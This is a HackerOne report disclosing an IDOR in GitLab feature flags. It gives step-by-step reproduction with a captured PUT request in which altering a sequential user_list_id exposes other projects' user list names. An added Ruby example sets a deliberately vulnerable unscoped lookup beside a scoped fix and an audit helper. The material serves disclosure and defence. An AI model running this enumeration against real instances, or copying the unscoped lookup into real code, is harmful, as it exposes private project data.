
IDOR-Get feature flag user list (including user IDs) of any private/public projects

HackerOne report #962408 by ashish_r_padelkar on 2020-08-19, assigned to @kaunghtet:

Report

Summary

Hello,

It is possible to get feature flag user list of any private/public project by just supplying the 2 digit sequential ID in the request. This way we can enumerate all such feature flag user lists.

Steps to reproduce
  1. Go to https://gitlab.com/<NameSpace>/project_1/-/feature_flags
  2. EDIT any existing feature flag.
  3. In the Type dropdown select the User List option and then select the available user list from your project.
  4. Click save and capture the below request.
PUT /group_new_1/project_1/-/feature_flags/1 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 295  
Accept: application/json, text/plain, */*  
X-CSRF-Token: 1  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/group_new_1/project_1/-/feature_flags/1/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: 1


{"operations_feature_flag":{"name":"wwwwww","description":"","version":"new_version_flag","active":true,"strategies_attributes":[{"id":532,"name":"gitlabUserList","_destroy":false,"scopes_attributes":[{"id":1146,"_destroy":false,"environment_scope":"wwww"}],"parameters":{},"user_list_id":39}]}}  
  5. Just change the value of the user_list_id parameter in the above request to any 2 digit sequential ID and send the request.

You should see the name of the user list in the response as well as on the feature flag page when you reload. Note that this is also possible when the user lists you obtain belong to private projects.

What is the current bug behavior?

Possible to get Feature Flag user list name of any project (including private)

What is the expected correct behavior?

If a feature flag user list belongs to a private project, you should not be able to get its name.

Output of checks

This bug happens on GitLab.com GitLab Enterprise Edition 13.3.0-pre 9bb21f0d61c

Regards,
Ashish

Impact

IDOR to get feature flag user list names from any project (including private)
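The root cause the report describes is a lookup that resolves `user_list_id` globally instead of within the project named in the URL. The following Ruby example is added here to illustrate that pattern and its fix; it is not GitLab's code. The `Project`/`UserList` structs, the in-memory records, the IDs and names, and the `update_strategy`/`audit_requests` helpers are all constructed for this illustration.

```ruby
# Added illustration (not GitLab's code): an unscoped lookup that leaks another
# project's feature-flag user list name, next to a project-scoped lookup that
# does not. All data below is constructed for this example.

Project  = Struct.new(:id, :visibility)           # :public or :private
UserList = Struct.new(:id, :project_id, :name)

# Constructed sample data: user-list IDs are sequential across projects, which
# is what makes an unscoped lookup enumerable.
PROJECTS = {
  1 => Project.new(1, :public),
  2 => Project.new(2, :private),
}.freeze

USER_LISTS = [
  UserList.new(39, 1, "beta-testers"),
  UserList.new(40, 2, "internal-staff"),   # owned by the private project
  UserList.new(41, 2, "execs"),            # owned by the private project
].freeze

# Vulnerable lookup: resolves the id across every project, so a request made
# against project 1 can attach (and learn the name of) a list owned by project 2.
def find_user_list_unscoped(user_list_id)
  USER_LISTS.find { |l| l.id == user_list_id }
end

# Hardened lookup: the id is only meaningful inside the current project.
# Returns nil for ids that belong elsewhere, which the caller turns into an
# error response that reveals nothing about the other project's lists.
def find_user_list_scoped(project_id, user_list_id)
  USER_LISTS.find { |l| l.project_id == project_id && l.id == user_list_id }
end

# Simulated strategy-update handler. The project comes from the URL
# (/group/project/-/feature_flags/1); user_list_id comes from the JSON body
# and is therefore attacker-controlled input.
def update_strategy(project_id, params, scoped: true)
  list = scoped ? find_user_list_scoped(project_id, params["user_list_id"])
                : find_user_list_unscoped(params["user_list_id"])
  return { status: 422, error: "user_list not found in project" } if list.nil?

  { status: 200, user_list: { "id" => list.id, "name" => list.name } }
end

# Audit helper for a defender reviewing request logs: given the ids one project
# submitted, return those that resolve to lists owned by a different project.
# A run of sequential ids landing in other projects is the enumeration pattern
# the report describes.
def audit_requests(project_id, requested_ids)
  requested_ids.map { |id| find_user_list_unscoped(id) }
               .compact
               .reject { |l| l.project_id == project_id }
               .map(&:id)
end

if __FILE__ == $PROGRAM_NAME
  params = { "user_list_id" => 40 }
  p update_strategy(1, params, scoped: false)  # leaks "internal-staff"
  p update_strategy(1, params)                 # 422, nothing disclosed
  p audit_requests(1, [39, 40, 41, 42])        # [40, 41]
end
```

The fix is the scoping, not an extra visibility check bolted on afterwards: once the lookup is restricted to the current project, a list from a private project is simply not found, so the response carries the same information whether the id exists elsewhere or not.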

Edited by Kaung Htet Aung